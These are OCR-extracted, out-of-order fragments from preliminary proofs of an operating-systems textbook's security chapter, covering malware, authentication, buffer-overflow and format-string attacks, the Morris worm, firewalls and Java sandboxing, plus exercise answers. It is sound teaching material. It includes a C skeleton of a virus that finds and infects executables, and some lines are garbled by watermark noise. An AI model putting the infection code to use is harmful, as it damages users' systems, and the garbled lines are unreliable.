36. example of targeted malware is a program that could be written by an ambitious corporate vice president and released onto the local LAN The virus would check if it was running on the president s machine and if so go find a spreadsheet and swap two random cells Sooner or later the president would make a bad decision based on the spreadsheet output and perhaps get fired as a result opening up a position for you know who Some people walk around all day with a chip on their shoulder not to be PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 60 storage in a retrieval system or 4HASMREIBY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise confused with people with an RFID chip in their shoulder They have some real or imagined grudge against the world and want to get even Malware can help Many modern computers hold the BIOS in flash memory which can be rewritten under program control to allow the manufacturer to distribute bug fixes electroni cally Malware can write random junk in the flash memory so that the computer will no longer boot If the flash memory chip is in a socket fixing the problem requires openin
37. examples of mobile code but there are many others Given the long discussion about viruses and worms earlier it should be clear that allowing foreign code to run on your machine is more than a wee bit risky Nevertheless some people do want to run these foreign programs thus the ques tion arises Can mobile code be run safely The short answer is Yes but not easily The fundamental problem is that when a process imports an applet or other mobile code into its address space and runs it that code is running as part of a valid user process and has all the power that user has including the ability to read write erase or encrypt the user s disk files e mail data to far away coun tries and much more Long ago operating systems developed the process concept to build walls between users The idea is that each process has its own protected address space and own UID allowing it to touch files and other resources belonging to it but not to other users For providing protection against one part of the process the applet and the rest the process concept does not help Threads allow multiple threads of control within a process but do nothing to protect one thread against another one In theory running each applet as a separate process helps a little but is often infeasible For example a Web page may contain two or more applets that interact with each other and with the data on the Web page The Web browser may also need to int
38. for a program named prog exe In Windows when the user clicks on Start and then Run the same thing happens Nowadays most programs are exe files com files are very rare Suppose that Virgil knows that many people run prog exe from an MS DOS PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 64 storage in a retrieval system or HASMREIBY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise prompt or from Run on Windows He can then simply release a virus called prog com which will get executed when anyone tries to run prog unless he actu ally types the full name prog exe When prog com has finished its work it then just executes prog exe and the user is none the wiser A somewhat related attack uses the Windows desktop which contains shortcuts symbolic links to programs A virus can change the target of a shortcut to make it point to the virus When the user double clicks on an icon the virus is executed When it is done the virus just runs the original target program Executable Program Viruses One step up in complexity are viruses that infect executable programs The simplest of these viruses just overwr
39. full file path possibly by con catenating the current directory path with a file name and then opening it or doing something else with it A has a fixed size buffer i e array B to hold a file name as shown in Fig 9 24 b Using a fixed size buffer to hold the file name is much easier to program than first determining the actual size and then dynami cally allocating enough storage If the buffer is 1024 bytes that should handle all file names right Especially if the operating system limits file names or better yet full paths to a maximum of no more than 255 characters Unfortunately this reasoning contains a fatal flaw Suppose that the user of the program provides a file name that is 2000 characters long When the file name is used it will fail to open but the attacker does not care When the procedure copies the file name into the buffer the name overflows the buffer and overwrites memory as shown in the gray area of Fig 9 24 c Worse yet if the file name is PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any_prohibited reproduction SEC 9 6 storage in a retrieval Syatath OLTENGMIGSID IG Bly An or by any means electronic 51 mechanical photocopying recording or likewise
40. good idea and click YES Bingo They re history Sophisticated users may check out the rest of the dialog box where they will find two other items One is a link the Web page s certificate as discussed in Sec 9 2 4 provided by some CA they have never heard of and which contains no PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any_prohibited reproduction SEC 9 7 storage in a retrieval system orMlanbrWSAIBAn any form or by any means electronic T mechanical photocopying recording or likewise useful information other than the fact that CA vouches that the company exists and had enough money to pay for the certificate The other is a hyperlink to a dif ferent Web page provided by the Web page being visited It is supposed to explain what the activeX control does but in fact it can be about anything and generally explains how wonderful the activeX control is and how it will improve your surfing experience Armed with this bogus information even sophisticated users often click YES If they click NO often a script on the Web page uses a bug in IE to try to download the spyware anyway If no bug is available to exploit it may just try to download the activeX control again and again
41. great potential for spying on data and performing all manner of mischief Boot Sector Viruses As we discussed in Chap 5 when most computers are turned on the BIOS reads the master boot record from the start of the boot disk into RAM and exe cutes it This program determines which partition is active and reads in the first sector the boot sector from that partition and executes it That program then either loads the operating system or brings in a loader to load the operating sys tem Unfortunately many years ago one of Virgil s friends got the idea of creating a virus that could overwrite the master boot record or the boot sector with devas tating results Such viruses called boot sector viruses are very common Normally a boot sector virus which includes MBR Master Boot Record viruses first copies the true boot sector to a safe place on the disk so it can boot the operating system when it is finished The Microsoft disk formatting program fdisk skips the first track so that is a good hiding place on Windows machines Another option is to use any free disk sector and then update the bad sector list to mark the hideout as defective In fact if the virus is large it can also disguise the PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and w
42. here will be on the firewall functionality 207 68 160 190 80 207 68 160 191 25 207 68 160 192 21 Web Email FTP lt Firewall ewa server server server Network connection KY Local area network Figure 9 31 A simplified view of a hardware firewall protecting a LAN with three computers Firewalls are configured with rules describing what is allowed in and what is allowed out The owner of the firewall can change the rules commonly via a Web interface most firewalls have a mini Web server built in to allow this In the simplest kind of firewall the stateless firewall the header of each packet passing through is inspected and a decision is made to pass or discard the packet based solely on the information in the header and the firewall s rules The information in the packet header includes the source and destination IP addresses source and destination ports type of service and protocol Other fields are available but rarely occur in the rules In the example of Fig 9 31 we see three servers each with a unique IP address of the form 207 68 160 x where x is 190 191 and 192 respectively These are the addresses to which packets must be sent to get to these servers Incoming packets also contain a 16 bit port number which specifies which pro cess on the machine gets the packet a process can listen on a port for incoming traffic Some ports have standard
43. his hand into it and the length of all his fingers is measured and checked against the database Finger length measurements are not perfect however The system can be attacked with hand molds made out of plaster of Paris or some other material pos sibly with adjustable fingers to allow some experimentation Another biometric that is in widespread commercial use is iris recognition No two people have the same patterns even identical twins so iris recognition is as good as fingerprint recognition and more easily automated Daugman 2004 The subject just looks at a camera up to 1 meter away which photographs the sub ject s eyes and extracts certain characteristics by performing what is called a gabor wavelet transformation and compresses the results to 256 bytes This string is compared to the value obtained at enrollment time and if the Hamming distance is below a critical threshold the person is authenticated The Hamming distance between two bit strings is the minimum number of changes needed to transform one into the other Any technique that relies on images is subject to spoofing For example a person could approach the equipment for example an ATM machine camera wearing dark glasses to which photographs of someone else s eyes were attached After all if the ATM s camera can take a good iris photo at 1 meter other people can do it too and at greater distances using telephoto lenses For this reason countermeasures may b
44. horses viruses and worms and collectively called malware often quickly spread around the world As reports were published about how many millions of dollars of damage the malware caused and how many people lost their valuable data as a result the authors would be very impressed with their programming skills To them it was just a fun prank they were not making any money off it after all Those days are gone Malware is now written on demand by well organized criminals who prefer not to see their work publicized in the newspapers They are in it entirely for the money A large fraction of all malware now is designed to spread as quickly as possible over the Internet and infect as many machines as it can When a machine is infected software is installed that reports the address of the captured machine back to certain machines often in countries with poorly developed or corrupt judicial systems for example in some of the former Soviet Republics A backdoor is also installed on the machine that allows the criminals who sent out the malware to easily command the machine to do what it is in structed to do A machine taken over in this fashion is called a zombie and a col lection of them is called a botnet a contraction of robot network A criminal who controls a botnet can rent it out for various nefarious and always commercial purposes A common one is for sending out commercial spam If a major spam attack occurs and the police try to track
45. impermissible way The downside of interpretation in general is that it is very PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 10 storage in a retrieval system or HAsMMREiBY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise slow compared to running native compiled code 9 8 7 Java Security The Java programming language and accompanying run time system were designed to allow a program to be written and compiled once and then shipped over the Internet in binary form and run on any machine supporting Java Security was a part of the Java design from the beginning In this section we will describe how it works Java is a type safe language meaning that the compiler will reject any attempt to use a variable in a way not compatible with its type In contrast consider the following C code naughty _func char p p rand p 0 It generates a random number and stores it in the pointer p Then it stores a 0 byte at the address contained in p overwriting whatever was there code or data In Java constructions that mix types like this are forbidden by the grammar In addi tion Java has no pointer var
46. in register 1 The validity of such instructions must be checked at run time This is done by inserting code directly before the indirect jump to test the target address An example of such a test is shown in Fig 9 37 b Remember that all valid addresses have the same upper k bits so this prefix can be stored in a scratch register say S2 Such a register cannot be used by the applet itself which may require rewriting it to avoid this register The code works as follows First the target address under inspection is copied to a scratch register S1 Then this register is shifted right precisely the correct number of bits to isolate the common prefix in S1 Next the isolated prefix is compared to the correct prefix initially loaded into S2 If they do not match a trap occurs and the applet is killed This code sequence requires four instructions and two scratch registers Patching the binary program during execution requires some work but it is doable It would be simpler if the applet were presented in source form and then compiled locally using a trusted compiler that automatically checked the static addresses and inserted code to verify the dynamic ones during execution Either way there is some run time overhead associated with the dynamic checks Wahbe et al 1993 have measured this as about 4 which is generally accept able A second problem that must be solved is what happens when an applet tries to make a system call The solution her
47. lion to stop including the rootkit on future CDs and to give each victim the right to download three albums from a limited music catalog On January 2007 Sony admitted that its software also secretly monitored users listening habits and re PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction SEC 9 7 storage in a retrieval system orMlanbrWSAIBdn any form or by any means electronic 3 mechanical photocopying recording or likewise ported them back to Sony in violation of U S law In a settlement with the FTC Sony agreed to pay people whose computers were damaged by their software 150 The Sony rootkit story has been provided for the benefit of any readers who might have been thinking that rootkits are an academic curiosity with no real world implications An Internet search for Sony rootkit will turn up a wealth of additional information 9 8 DEFENSES With problems lurking everywhere is there any hope at making systems secure Actually there is and in the following sections we will look at some of the ways systems can be designed and implemented to increase their security One of the most important concepts is defense in depth Basically the i
48. machines that are easy to break into Some of the scripts even pick a network to attack by chance using a random network number in the upper part of the IP address They then probe all the machines on the network to see which ones respond Once a database of valid IP addresses has been acquired each machine is attacked in sequence As a consequence of this methodology it can happen that a brand new machine at a secure military installation can be attacked within hours of its being attached to the Internet even though no one but the administrator even knows about it yet UNIX Password Security Some older operating systems keep the password file on the disk in unen crypted form but protected by the usual system protection mechanisms Having all the passwords in a disk file in unencrypted form is just looking for trouble because all too often many people have access to it These may include system administrators machine operators maintenance personnel programmers man agement and maybe even some secretaries A better solution used in UNIX works like this The login program asks the user to type his name and password The password is immediately encrypted by using it as a key to encrypt a fixed block of data Effectively a one way func tion is being run with the password as input and a function of the password as output This process is not really encryption but it is easier to speak of it as encryption The login program th
49. minimal special hardware is voice biometrics Mar kowitz 2000 All that is needed is a microphone or even a telephone the rest is software In contrast to voice recognition systems which try to determine what the speaker is saying these systems try to determine who the speaker is Some systems just require the user to say a secret password but these can be defeated by an eavesdropper who can tape record passwords and play them back later More advanced systems say something to the user and ask that it be repeated back with different texts used for each login Some companies are starting to use voice identification for applications such as home shopping over the telephone because voice identification is less subject to fraud than using a PIN code for identification We could go on and on with more examples but two more will help make an PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 46 storage in a retrieval system or HAsMREiBY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise important point Cats and other animals mark off their territory by urinating around its perimeter Apparently cats can identify each o
50. not belong crackers Some people talk about white hat hackers to mean the good guys and black hat hackers to mean the bad guys but in our experience most hackers stay indoors all the time and do not wear hats so you cannot distinguish them by their millinery 9 4 1 Authentication Using Passwords The most widely used form of authentication is to require the user to type a login name and a password Password protection is easy to understand and easy to implement The simplest implementation just keeps a central list of login name password pairs The login name typed in is looked up in the list and the typed password is compared to the stored password If they match the login is allowed if they do not match the login is rejected It goes almost without saying that while a password is being typed in the computer should not display the typed characters to keep them from prying eyes near the monitor With Windows as each character is typed an asterisk is displayed With UNIX nothing at all is displayed while the password is being typed These schemes have different properties The Windows scheme may make it easy for absent minded users to see how many characters they have typed so far but it also discloses the password length to eavesdroppers for some reason English has a word for auditory snoopers but not for visual snoopers other than perhaps Peeping Tom which does not seem right in this context From a security perspective sile
51. obtained from the publisher prior to any prohibited reproduction SEC 9 8 storage in a retrieval system or lPEYSHINSEDSin any form or by any means electronic mechanical photocopying recording or likewise If the applet passes all the tests it can be safely run without fear that it will access memory other than its own However applets can still make system calls by calling Java methods pro cedures provided for that purpose The way Java deals with that has evolved over time In the first version of Java JDK Java Development Kit 1 0 applets were divided into two classes trusted and untrusted Applets fetched from the local disk were trusted and allowed to make any system calls they wanted In contrast applets fetched over the Internet were untrusted They were run in a sandbox as shown in Fig 9 38 and allowed to do practically nothing After some experience with this model Sun decided that it was too restrictive In JDK 1 1 code signing was employed When an applet arrived over the Inter net a check was made to see if it was signed by a person or organization the user trusted as defined by the user s list of trusted signers If so the applet was allowed to do whatever it wanted If not it was run in a sandbox and severely res tricted After more experience this proved unsatisfactory as well so the security model was changed again JDK 1 2 introduced a configurable fine grain security policy that applies to all applets
52. or HASMIRSIBY in any form or by any means elecfrdiAP 9 mechanical photocopying recording or likewise tools needed to overwrite the return address of the printf function on the stack and jump somewhere else for example into the newly entered format string This approach is called a format string attack Once the user has the ability to overwrite memory and force a jump to newly injected code the code has all the power and access that the attacked program has If the program is SETUID root the attacker can create a shell with root privileges The details for making this attack work are a bit too complicated and specialized to reproduce here but suf fice it to say that this attack is a real problem If you type format string attack to Google you will find a great deal of information on the problem As an aside the used of fixed size character arrays in this example could also be subject to a buffer overflow attack 9 6 3 Return to libe Attacks Both the buffer overflow attack and the format string attack require getting attack supplied data onto the stack and then making the current function return to this data instead of returning to its caller One way to combat these attacks is to mark the stack pages as read write but not execute Modern Pentium CPUs can do this although most operating systems do not avail themselves of this possibil ity But there is another attack that still works even if programs on the stack can not be
53. protection matrix is more suitable for the following operations a Granting read access to a file for all users b Revoking write access to a file from all users c Granting write access to a file to John Lisa Christie and Jeff d Revoking execute access to a file from Jana Mike Molly and Shane 11 Two different protection mechanisms that we have discussed are capabilities and access control lists For each of the following protection problems tell which of these mechanisms can be used a Ken wants his files readable by everyone except his office mate b Mitch and Steve want to share some secret files c Linda wants some of her files to be public 12 Represent the ownerships and permissions shown in this UNIX directory listing as a protection matrix Note asw is a member of two groups users and devel gmw is a member of only users Treat each of the two users and two groups as a domain so the matrix has four rows one per domain and four columns one per file rw f 1r 2 gmw users 908 May 26 16 45 PPP Notes rwx x x 1 asw devel 432 May 13 12 35 prog1 rw rw 1 asw users 50094 May 30 17 51 project t tw f 1 asw devel 13124 May 31 14 30 splash gif 13 Express the permissions shown in the directory listing of the previous problem as access control lists 14 Modify the ACL for one file to grant or deny an access that cannot be expressed using the UNIX rwx system Explain this modific
54. recursively search for executables DIR dirp pointer to an open directory stream struct dirent dp pointer to a directory entry dirp opendir dir_name open this directory if dirp NULL return dir could not be opened forget it while TRUE dp readdir dirp read next directory entry if dp NULL NULL means we are done chdir go back to parent directory break exit loop if dp gt d_name 0 continue skip the and directories Istat dp gt d_name amp sbuf is entry a symbolic link if S_ISLNK sbuf st_mode continue skip symbolic links if chdir dp gt d __name 0 if chdir succeeds it must be a dir search yes enter and search it else no file infect it if access dp gt d_name X_OK 0 if executable infect it infect dp gt d_name closedir dirp dir processed close and return Figure 9 27 A recursive procedure that finds executable files on a UNIX system same file twice just wastes time Third measures could be taken to keep the time of last modification and file size the same as it was to help hide the infection For programs larger than the virus the size will remain unchanged but for programs smaller than the virus the program will now be bigger Since most viruses are smaller than most programs this is not a serious problem Although this program is not very long
55. remote shell uploaded the worm program and continued infecting new machines from there Method 2 made use of a program present on all systems called finger that allows a user anywhere on the Internet to type finger name site to display information about a person at a particular installation This information usually includes the person s real name login home and work addresses and tele phone numbers secretary s name and telephone number FAX number and simi lar information It is the electronic equivalent of the phone book Finger works as follows At every site a background process called the finger daemon runs all the time fielding and answering queries from all over the Internet What the worm did was call finger with a specially handcrafted 536 byte string as parameter This long string overflowed the daemon s buffer and overwrote its stack the way shown in Fig 9 24 c The bug exploited here was the daemon s failure to check for overflow When the daemon returned from the procedure it was in at the time it got the request it returned not to main but to a procedure inside the 536 byte string on the stack This procedure tried to execute sh If it worked the worm now had a shell running on the machine under attack Method 3 depended on a bug in the mail system sendmail which allowed the worm to mail a copy of the bootstrap and get it executed Once established the worm tried to break user passwords Morris did not have to
56. requires a way to obtain the original text from the cyphertext using a decryption algorithm and a key The UNIX mechanism makes use of a one way function that cannot be inverted D 27 Suppose there are m users in the systems The cracker can then collect the m salt values assumed all different here The cracker will have to try encrypting each guessed password m times once with each of the m salts used by the system Thus the cracker s time to crack all passwords is increased m fold 28 There are many criteria Here are a few of them It should be easy and painless to measure not blood samples There should be many values available not eye color The characteristic should not change over time not hair color It should be difficult to forge the characteristic not weight 29 If all the machines can be trusted it works ok If some cannot be trusted the scheme breaks down because an untrustworthy machine could send a message to a trustworthy machine asking it to carry out some command on behalf of the superuser The machine receiving the message has no way of telling if the command really did originate with the superuser or with a student 30 Both of them make use of one way encryption functions UNIX stores all passwords in the password file encrypted and Lamport s scheme uses one way functions to gen erate a sequence of passwords 31 It would not work to use them forward If an intruder captured one he would know w
57. services associated with them In particular port 80 is used for the Web port 25 is used for e mail and port 21 is used for FTP file transfer service but most of the others are available for user defined ser vices Under these conditions the firewall might be configured as follows IP address Port Action 207 68 160 190 80 Accept 207 68 160 191 25 Accept 207 68 160 192 21 Accept Deny PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction SEC 9 8 storage in a retrieval system or lPE4SHINSEDSin any form or by any means electronic 5 mechanical photocopying recording or likewise These rules allow packets to go to machine 207 68 160 190 but only if they are addressed to port 80 all other ports on this machine are disallowed and packets sent to them will be silently discarded by the firewall Similarly packets can go to the other two servers if addressed to ports 25 and 21 respectively All other traffic is discarded This ruleset makes it hard for an attacker to get any access to the LAN except for the three public services being offered Despite the firewall it is still possible to attack the LAN For example if the Web server is apache and the cra
58. telnet connections so employees on a business trip or at a different branch office or students at home can log in remotely Not only are user passwords often weak but sometimes the root password is too In particular some installations never bother to change the default passwords that systems are shipped with Cliff Stoll an astronomer at Berkeley had observed irregularities on his system and laid a trap for the cracker who had been trying to get in Stoll 1989 He observed the session shown in Fig 9 18 typed by a cracker who had already broken into one machine at the Lawrence Berkeley Laboratory LBL and was trying to get into another one The uucp UNIX to UNIX Copy Program account is used for intermachine network traffic and has superuser power so the cracker was now in a U S Dept of Energy machine as superuser Fortunately LBL does not design nuclear weapons although its sister lab at Livermore does One hopes their security is better but there is little reason to believe that since another nuclear weapons lab Los Alamos lost a hard disk full of classified information in 2000 Once a cracker has broken into a system and become superuser it may be possible to install a packet sniffer software that examines all incoming and out going network packets looking for certain patterns An especially interesting pat tern to look for is people on the compromised machine logging into remote machines especially as superuser there This in
59. the user manual from the manufac turer s Website Got the message In the next few sections we will look at some of the more common forms of malware how they are constructed and how they spread Later in the chapter we will examine some of the ways they can be defended against 9 7 1 Trojan Horses Writing malware is one thing You can do it in your bedroom Getting mil lions of people to install it on their computer is quite something else How would our malware writer Mal go about this A very common practice is to write some genuinely useful program and embed the malware inside of it Games music play ers special porno viewers and anything with splashy graphics is a likely candi date People will then voluntarily download and install the application As a free bonus they get the malware installed too This approach is called a Trojan horse attack after the wooden horse full of Greek soldiers described in Homer s Odys sey In the computer security world it has come to mean any malware hidden in PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction SEC 9 7 storage in a retrieval system orMla nbrWSAIBAn any form or by any means electronic mecha
60. to download the image and the steganography tools needed to extract the plays Another use of steganography is to insert hidden watermarks into images used on Web pages to detect their theft and reuse on other Web pages If your Web page contains an image with the secret message Copyright 2008 General Images Corporation you might have a tough time convincing a judge that you produced the image yourself Music movies and other kinds of material can also be water marked in this way Of course the fact that watermarks are used like this encourages some people to look for ways to remove them A scheme that stores information in the low order bits of each pixel can be defeated by rotating the image 1 degree clockwise then converting it to a lossy system such as JPEG then rotating it back by 1 degree Finally the image can be reconverted to the original encoding system e g gif bmp tif The lossy JPEG conversion will mess up the low order bits and the rotations involve massive floating point calculations which introduce roundoff errrors also adding noise to the low order bits The people putting in the watermarks know this or should know this so they put in their copyright infor mation redundantly and use schemes besides just using the low order bits of the pixels In turn this stimulates the attackers to look for better removal techniques And so it goes 9 4 AUTHENTICATION Every secured computer system must require all users to b
61. to any prohibited reproduction SEC 9 5 storage in a retrieval systeHW SIDER nASEIBAM Katy form or by any means electronic 47 mechanical photocopying recording or likewise Going off might involve clearing the disk erasing files at random carefully making hard to detect changes to key programs or encrypting essential files In the latter case the company has a tough choice about whether to call the police which may or may not result in a conviction many months later but certainly does not restore the missing files or to give in to this blackmail and to rehire the ex programmer as a consultant for an astronomical sum to fix the problem and hope that he does not plant new logic bombs while doing so There have been recorded cases in which a virus planted a logic bomb on the computers it infected Generally these were programmed to go off all at once on some date and time in the future However since the programmer has no idea in advance of which computers will be hit these logic bombs cannot be used for job protection or blackmail Often they are set to go off on a date that has some politi cal significance Sometimes these are called time bombs 9 5 2 Trap Doors Another security hole caused by an insider is the trap door This problem is created by code inserted into the system by a system programmer to bypass some normal check For example a programmer could add code to the login program to allow anyone to log in using th
62. typing YES causing the card to send a little encrypted message to the merchant The merchant can later turn the message over to a bank to be credited for the amount paid The big advantage of smart cards over say credit or debit cards is that they do not need an online connection to a bank If you do not believe this is an advan tage try the following experiment Try to buy a single candy bar at a store and insist on paying with a credit card If the merchant objects say you have no cash with you and besides you need the frequent flyer miles You will discover that the merchant is not enthusiastic about the idea because the associated costs dwarf the profit on the item This makes smart cards useful for small store purchases pay phones parking meters vending machines and many other devices that normally require coins They are in widespread use in Europe and spreading elsewhere Smart cards have many other potential uses e g encoding the bearer s aller gies and other medical conditions in a secure way for use in emergencies but this is not the place to tell that story Our interest here is how they can be used for secure login authentication The basic concept is simple a smart card is a small tamperproof computer that can engage in a discussion protocol with a central computer to authenticate the user For example a user wishing to buy things at an e commerce Web site could insert a smart card into a home reader attached to hi
63. valid All she learns is that the login name plus password combination tried is wrong As an aside on login most notebook computers are configured to require a login name and password to protect their contents in the event they are lost are stolen While better than nothing it is not much better than nothing Anyone who gets a hold of the notebook can turn it on and immediately go into the BIOS setup program by hitting DEL or F8 or some other BIOS specific key usually displayed on the screen before the operating system is started Once there he can change the boot sequence telling it to boot from a USB stick before trying the hard disk The finder then inserts a USB stick containing a complete operating system and boots from it Once running the hard disk can be mounted in UNIX or accessed as the D drive Windows To prevent this situation most BIOSes allow the user to password protect the BIOS setup program so that only the owner can change the boot sequence If you have a notebook computer stop reading now Go put a password on your BIOS then come back How Crackers Break In Most crackers break in by connecting to the target computer e g over the Internet and trying many login name password combinations until they find one that works Many people use their name in one form or another as their login name For Ellen Ann Smith ellen smith ellen_smith ellen smith ellen smith esmith easmith and eas are all reasonable candidat
64. viruses worms spyware and rootkits Each of these poses a threat to data confidentiality and integrity Worse yet a malware attack may be able to take over a machine and turn it into a zombie which sends spam or is used to launch other attacks Fortunately there are a number of ways systems can defend themselves The best strategy is defense in depth using multiple techniques Some of these include firewalls viruse scanners code signing jailing and intrusion detection systems and encapsulating mobile code PROBLEMS 1 Break the following monoalphabetic cipher The plaintext consisting of letters only is a well known excerpt from a poem by Lewis Carroll kfd ktbd fzm eubd kfd pzyiom mztx ku kzyg ur bzha kfthcm ur mfudm zhx mftnm zhx mdzythe pzq ur ezsszcdm zhx gthcm zhx pfa kfd mdz tm sutythe fuk zhx pfdkfdi ntem fzld pthcm sok pztk z stk kfd uamkdim eitdx sdruid pd fzld uoi efzk rui mubd ur om zid uok ur sidzkf zhx zyy ur om zid rzk hu foiia mztx kfd ezindhkdi kfda kfzhgdx ftb boef rui kfzk 2 Consider a secret key cipher that has a 26 x 26 matrix with the columns headed by ABC Z and the rows are also ABC Z Plaintext is encrypted two characters at a time The first character is the column the second is the row The cell formed by the intersection of the row and column contains two ciphertext characters What constraint must the matrix adhere to and how many keys are there 3 Consider the following way to encrypt a fi
65. which it is desirable to have some function f which has the property that given f and its parameter x computing y f x is easy to do but given only f x finding x is computationally infeasible Such a function typically mangles the bits in complex ways It might start out by initializing y to x Then it could have a loop that iterates as many times as there are 1 bits in x with each iteration permuting the bits of y in an iteration dependent way adding in a different constant on each iteration and gen erally mixing the bits up very thoroughly Such a function is called a crypto graphic hash function PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 10 storage in a retrieval system or HASMREIBY in any form or by any means elecfrddi amp P 9 mechanical photocopying recording or likewise 9 2 4 Digital Signatures Frequently it is necessary to sign a document digitally For example suppose a bank customer instructs the bank to buy some stock for him by sending the bank an e mail message An hour after the order has been sent and executed the stock crashes The customer now denies ever having sent the e mail The bank can pro duce the e mail of course
66. 9 11 A reference monitor One of the goals of some current security research is to reduce the trusted computed base from millions of lines of code to merely tens of thousands of lines of code In Fig 1 26 we saw the structure of the MINIX 3 operating sysem which is a POSIX conformant system but with a radically different structure than Linux or FreeBSD With MINIX 3 only about 4000 lines of code run in the ker nel Everything else runs as a set of user processes Some of these like the file system and the process manager are part of the trusted computing base since they can easily compromise system security But other parts such as the printer driver and the audio driver are not part of the trusted computing base and no matter what is wrong with them even if they are taken over by a virus there is nothing they can do to compromise system security By reducing the trusted computing base by two orders of magnitude systems like MINIX 3 can potentially offer much higher security than conventional designs PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction SEC 9 3 storage in a retrievaPR Gdn GAASILE Sor by any means electronic 23 mechanical photocopying record
67. Execute Figure 9 5 A protection matrix Domain switching itself can be easily included in the matrix model by realiz ing that a domain is itself an object with the operation enter Figure 9 6 shows the matrix of Fig 9 5 again only now with the three domains as objects them selves Processes in domain 1 can switch to domain 2 but once there they cannot go back This situation models executing a SETUID program in UNIX No other domain switches are permitted in this example 9 3 2 Access Control Lists In practice actually storing the matrix of Fig 9 6 is rarely done because it is large and sparse Most domains have no access at all to most objects so storing a very large mostly empty matrix is a waste of disk space Two methods that are practical however are storing the matrix by rows or by columns and then storing only the nonempty elements The two approaches are surprisingly different In this section we will look at storing it by column in the next one we will study storing it by row PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publicatoni is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction 9 3 storage in a retrievaPs Sank GATANS inha hor by any means electronic mechanical photocopying recording
68. Figure 9 3 a Computing a signature block b What the receiver gets When the document and hash arrive the receiver first computes the hash of the document using MD5 or SHA as agreed upon in advance The receiver then applies the sender s public key to the signature block to get E D hash In effect it encrypts the decrypted hash canceling it out and getting the hash back If the computed hash does not match the hash from the signature block the document the signature block or both have been tampered with or changed by accident The value of this scheme is that it applies slow public key PRELIMINARY PROOFS Unpublished Work 2008 by Pearson Education Inc To be published by Pearson Prentice Hall Pearson Education Inc Upper Saddle River New Jersey All rights reserved This publication is protected by Copyright and written permission should be obtained from the publisher prior to any prohibited reproduction SEC 9 2 storage in a retrievaBASEMS Oran RIE OS Rod PUY or by any means electronic mechanical photocopying recording or likewise cryptography only to a relatively small piece of data the hash Note carefully that this method works only if for all x E D x x It is not guaranteed a priori that all encryption functions will have this property since all that we originally asked for was that D E x x that is E is the encryption function and D is the decryption function To get the signature propert
69. Most superusers exhort their mortal users to change their passwords once a month It falls on deaf ears Even more extreme is changing the password with every login leading to one time passwords When one time passwords are used the user gets a book containing a list of passwords Each login uses the next pass word in the list If an intruder ever discovers a password it will not do him any good since next time a different password must be used It is suggested that the user try to avoid losing the password book Actually a book is not needed due to an elegant scheme devised by Leslie Lamport that allows a user to log in securely over an insecure network using one time passwords Lamport 1981 Lamport s method can be used to allow a user running on a home PC to log in to a server over the Internet even though intruders may see and copy down all the traffic in both directions Furthermore no secrets have to be stored in the file system of either the server or the user s PC The method is sometimes called a one way hash chain The algorithm is based on a one way function that is a function y f x that has the property that given x it is easy to find y but given y it is computational infeasible to find x The input and output should be the same length for example 256 bits The user picks a secret password that he memorizes He also picks an integer n which is how many one time passwords the algorithm is able to generate As an exampl
